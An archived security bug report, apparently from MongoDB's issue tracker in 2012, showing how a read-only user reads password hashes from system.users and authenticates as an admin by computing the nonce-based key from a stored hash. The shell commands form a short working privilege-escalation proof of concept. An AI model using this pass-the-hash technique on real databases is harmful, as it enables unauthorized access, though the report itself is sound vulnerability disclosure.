Loading...

XML

Word

Printable

JSON

Type: Bug
Resolution: Duplicate
Priority: Critical - P2
Fix Version/s: None
Affects Version/s: None
Component/s: Security
Labels:
None
Environment:
all

Operating System:
ALL
Confidence Status:
None
Work Order:
0

Aha! Reference:
None
Tracking Level:
None
Risk Status:
None
Exec Notes:
None
Goal Name:
None
Goal Link:
None

read only user can get write priority by access other users's pwd hash

sample:
> db.system.users.find()

{ "_id" : ObjectId("4fd068ae34ae311cd063f9b2"), "user" : "sa", "readOnly" : false, "pwd" : "84c689ded211fb631fd5f5dedc5d4539" } { "_id" : ObjectId("4fd07496cf5f726c2428ac3a"), "user" : "ro", "readOnly" : true, "pwd" : "d8883d4475561e209dda05a54a98c8f6" }

> db.$cmd.findOne(

{getnonce:1}

)

{ "nonce" : "9892be9572e9851e", "ok" : 1 }

> db.runCommand(

{ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") }

)

{ "ok" : 1 }

is related to

SERVER-4692 Read-only users should be denied access to system.users collection

Closed

Assignee:: Unassigned
Reporter:: xie zhenye
Participants:: Eliot Horowitz, Spencer Brody, xie zhenye
Votes:: 0 Vote for this issue
Watchers:: 4 Start watching this issue

Created:: Jun 07 2012 09:46:35 AM UTC
Updated:: Aug 15 2012 02:04:17 PM UTC
Resolved:: Jun 12 2012 06:28:54 AM UTC

Details

Description

Attachments

Issue Links

Activity

People

Dates